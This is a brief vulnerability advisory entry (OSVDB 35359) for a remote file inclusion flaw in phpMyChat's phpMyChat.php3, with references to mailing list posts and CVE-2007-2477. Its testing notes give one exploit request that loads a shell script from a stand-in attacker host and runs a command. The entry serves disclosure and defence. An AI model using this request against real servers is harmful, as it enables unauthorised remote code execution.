phpMyChat phpMyChat.php3 ChatPath Variable Remote File Inclusion

2007-04-14T18:17:50
ID OSVDB:35359
Type osvdb
Reporter OSVDB
Modified 2007-04-14T18:17:50

Description

Manual Testing Notes

/phpMyChat.php3?=http://[attacker]/shell.txt?cmd=id

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0244.html Mail List Post: http://attrition.org/pipermail/vim/2007-April/001525.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0229.html Mail List Post: http://attrition.org/pipermail/vim/2007-April/001531.html CVE-2007-2477